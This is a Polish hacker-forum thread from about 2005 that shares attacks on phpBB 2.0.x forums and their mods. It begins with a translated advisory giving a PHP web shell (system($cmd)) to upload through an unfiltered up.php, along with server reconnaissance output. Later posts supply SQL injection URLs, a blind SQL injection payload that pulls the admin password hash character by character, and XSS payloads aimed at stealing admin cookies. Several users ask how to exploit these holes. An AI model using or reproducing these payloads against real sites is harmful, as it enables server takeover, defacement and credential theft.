phpBB Upload Skryptu "up.php" = dodawanie własnych

[DNSA]

kolejne tłumaczenie bugtraq'u
______________________________________________
Przetłumaczył: DNSA czyli ja chociaz tutaj blokers1990
Autor: Status-x
Kontakt: phr4xz gmail com - status-x hackersoft net
Data: 7 Kwiecień 2005
Strona www: http://defacers.com.mx
Orginalny Link: http://www.defacers.com.mx/advisories/2.txt
Ryzyko: WYSOKIE!!!

Afektowane oprogramowanie: phpBB 2.0.x

Coś dla początkujących:
phpBB jest sławnym systemem napisanym w php używanym przez forum. System jest ostoją dla obrazów, ankiet, prywatnych wiadomości i innego rodzaju czynników wykorzystywanych na stronach www


-= Wrażliwości =-


- | "Bezwzględny upload danych" |


W forach phpbb jest skrypt który umożliwia nam dodanie danych o jakich kolwiek wielkościach z każdym rozrzezeniem.


- | Przykład: |


Możemy stworzyć przykładowy kod który potem dodamy do strony www

<?

system($cmd)

?>

Zapisujemy skrypt jako cmd.php, i wchodzimy na strone:

--------------------------

http://adres strony/phpbb/up.php

--------------------------


I dodajemy nasz kod! Wtedy możemy sprawdzić czy nasz kod został dodany:

-----------------------------------

http://adres strony/phpbb/uploads/cmd.php

-----------------------------------


Cmd.php dodany do stronki:



Warning: system(): Cannot execute a blank command in
/home/target/public_html/forum/uploads/tetx.php on line 2


Możemy też wykonać komendy *NIX aby uzyskać nadzwyczajnie zadowalające informacje, które mogłyby zakończyć z okaleczeniem przejętą strone:

-----------------------------------------------------

Linux SERVER 2.4.21-4.0.1.ELsmp #1 SMP
Thu Oct 23 01:27:36 EDT 2003 i686 i686 i386 GNU/Linux
/home/target/public_html/forum/uploads
uid=32029(target) gid=530(target) groups=530(target)

------------------------------------------------------

To jest tylko przykład do czego jest zdolny złośliwy człowiek.


- | "Wyjawienie Haseł" |


Daleki albo lokalny napastnik również może odczytać plik config.php ujawniającym informacje o DB i prawdopodobnym haśle servera FTP.


------------------------------------------------------

Example

-= Jak naprawić? =-

Przefiltruj dozwolone rozrzeżenia dodawanych plików w źródle up.php
[/quote]

 

[mlody_pytacz]

Strasznie kulawo przetlumaczone. Uzywales do tego English translatora, czy co

A tak w ogole, to niby w jaki sposob wyciagnac do haslo na FTP ??
i o co chodzi z tym:

Linux SERVER 2.4.21-4.0.1.ELsmp #1 SMP
Thu Oct 23 01:27:36 EDT 2003 i686 i686 i386 GNU/Linux
/home/target/public_html/forum/uploads
uid=32029(target) gid=530(target) groups=530(target)[/b]

 

[DNSA]

.........przetłumacz lepiej

 

[mlody_pytacz]

Originally posted by blokers1990
.........przetłumacz lepiej

nie widze problemu, daj link ze zrodlem.
A tak btw nie biore sie za tlumaczenie rzeczy, o ktorych mam male pojecie, a jak widze, niestety ty tak robisz, bo nie potrafisz odpowiedziec mi na pytanie postawione dwa posty wczesniej... :-(

 

[kiela]

troche stary ten topic wiec przepraszam jka kogos urazilem

tak z ciekawosci sciagnelem sobie phpBB 2.0.13 (chyba tego samego uzywal autro tego buga) rozpakowalem wrzucilem na localhosta zainstalowalem wszystko poprawnie zrobilem nowego uzytkowanika zalogowalem sie i wspisuje sobie adres http://localhost/~phpBB2/up.php i co sie dzieje ?? wlasnie nic bo nie ma takiego pliku ani w wersji 2.0.13 ani w 2.0.14 ani we wczesniejszych katalogu upload tez tam nie ma ;] wiec co to za bug jak nie ma tych plikow ??

 

[NiuNio]

hm chyba go nie zrozumiales

 

[kiela]

to co zle zrobilem ?? jak w swierzo sciagnietym phpBB nie ma pliku up.php

 

[Chochlik]

Pan DNSA oczywiscie zapomnial jakze istotna rzecz, iz ten bug dotyczy pewnego moda do forum...

 

[DNSA]

jestem niewinny
tak pisało na securitystorm

 

[SaTaNiKa]

1. Jaki to jest mod i skąd wiadomo że jest na forum

2. A gdzie ma się znajdować pliczek do uploada ?? ??

3. O co biega z tym FTP ?? ?? jak tego uzyć ?? ??

 

[NiuNio]

to mod odnosnie UPLOADU na forum ;]

 

[Ewenement]

Jak bedziecie mieć coś do 2.0.14

bez zadnych modów byłbym wdzięczny

 

[circa]

Bledy w phpBB 2.0.14

Sposob wykorzystania:

1) Zly filtr kodu html

phpBB2/profile.php?mode=viewprofile&u=[]phpBB2/viewtopic.php?p=3&highlight=[]#####

2) XSS

POST /admin/admin_forums.php?sid=7bd54a5a9861ef180af78897e70 HTTP/1.1
forumname=<script>alert('NST')</script>&forumdesc=<script>alert
('NST')</script>&c=1&forumstatus=0&prune_days=
7&prune_freq=1&mode=createforum&f=&submit=Create
new
forum

Niektorzy ludzie nie potrafia wykorzystac tego typu bledy, a niektorzy tak. Za pomoca tego bledu mozna wykrasc plik cookies z haslem administratora i wiele innych rzeczy.

Referencje:
http://neosecurityteam.net/Advisories/Advisory-14.txt

przetlumaczyl: Łukasz 'm4rszal' Tryka

 

[mlody_pytacz]

hmm no wlasnie jakbys mogl powiedziec jak to wykorzystac...

 

[circa]

1) pomysl
2) poczytaj o php
3) reszta przyjdzie sama

 

[GreEnSnake]

Originally posted by Ewenement
Jak bedziecie mieć coś do 2.0.14

bez zadnych modów byłbym wdzięczny

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxx

metoda: SQL Injection
wersja: 2.0.x
Exploit:
links.php?func=show&id='[SQL Injection]

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxx

metoda: SQL Injection
wersja: 2.0.x
ExploiT:
dlman.php?func=file_info&file_id='[SQL Injection]

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxx

metoda: SQL Injection
wersja: nie wiem

ale na pewno na 2.0.14 i starszych
Błąd:
Skrypt nie filtruje zmiennej cat.
Jeżeli podamy tu coś błędnego:

/kb.php?mode=cat&cat='

otrzymamy błąd podobny do tego:

Could not obtain category data
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax
SELECT * FROM phpbb_kb_categories WHERE category_id = '
Line : 131
File : /tutaj/pelna/sciezka/functions_kb.php



/kb.php?mode=cat&cat=0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users+WHERE+1=0
No match: Categorie doesn't exist.

/kb.php?mode=cat&cat=0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users
Match: DEBUG MODE - SQL-Error

Dlatego jedyna rzecz jaką atakujący może znależć jest czy pasuje rząd czy nie.



Exploit:
Atakujący może porównać informacje w bazie danych z wartościami testowymi. Przykład:

0+UNION+SELECT+0,0,0,0,0,0+FROM+phpbb_users+WHERE+user_id=2+AND+ascii(substring(
user_password,1,1))=97

Jeżeli zwróci błąd SQL-Error, pierwszy znak hasza jest 'a'.
Exploit dostępny na stronach poniżej.

www.security-project.org
www.batznet.com

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxx

metoda: XSS
wersja: 2.0.14
- Exploit
---------------------------------------------------------
-=Złe filtrowanie kodu HTML=-

phpBB2/profile.php?mode=viewprofile&u=[]phpBB2/viewtopic.php?p=3&highlight=[]#########################################################

-=XSS=-

POST /admin/admin_forums.php?sid=7bd54a5a9861ef180af78897e70 HTTP/1.1
forumname=<script>alert('NST')</script>&forumdesc=<script>alert('NST')</script>&c=1&forumstatus=0&prune_days=7&prune_freq=1&mode=createforum&f=&submit=Create
new
forum

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxx

metoda: XSS
wersja: wszystkie do 2.0.15
Exploit:
http://www.example.com/phpBB2/profile.php?...profile&u=[]

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxx